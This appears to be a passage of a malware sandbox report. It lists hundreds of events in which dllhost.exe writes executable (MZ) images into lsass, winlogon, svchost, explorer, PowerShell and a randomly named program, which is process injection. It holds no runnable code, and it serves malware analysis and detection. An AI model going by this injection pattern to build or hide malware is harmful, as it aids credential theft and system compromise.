Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1C115C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BB497C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F46E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F47070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 220557A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE14340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 27C93250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227C0130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23A44F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F530850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13376160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000 value starts with: 4D5A
